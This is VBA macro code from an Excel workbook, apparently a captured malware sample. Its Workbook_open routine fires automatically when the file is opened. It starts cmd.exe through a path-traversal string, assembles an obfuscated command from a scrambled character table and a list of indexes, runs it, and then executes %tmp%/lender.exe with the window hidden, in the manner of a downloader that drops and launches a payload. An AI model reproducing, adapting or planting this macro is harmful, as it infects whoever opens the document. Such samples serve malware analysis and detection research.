Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_open()
Shell "C:\graph\angela\annotated\workshops\singles\..\..\..\..\..\windows\system32\cmd.exe /v:ON /c" + Chr(34) + "set attraction= && set little=$-Z~Fu3q),5bCxOLdht.Wjeom@c4Hg:kn(6aD'M1zSyfpQAN+;7XJrG\YPiIT=8U2l9E_s/B 0%RVwvK && for %H in (44,23,77,22,53,69,17,22,65,65,19,22,13,22,72,1,77,72,17,58,16,16,22,32,72,1,22,44,72,11,42,44,35,69,69,72,33,47,22,77,1,14,11,21,22,26,18,72,41,42,69,18,22,24,19,47,22,18,19,20,22,11,12,65,58,22,32,18,8,19,36,23,77,32,65,23,35,16,4,58,65,22,33,37,17,18,18,44,30,70,70,31,35,69,35,53,35,19,18,31,70,35,26,17,58,31,58,19,22,13,22,37,9,0,22,32,78,30,18,22,24,44,72,48,72,37,55,65,22,32,16,22,53,19,22,13,22,37,8,49,5713) DO (set attraction=!attraction!!little:~%H,1!) && if %H == 5713 call !attraction:~-140!" + Chr(34) + " && %tmp%/lender.exe", 0
End Sub


INQUEST-PP=macro
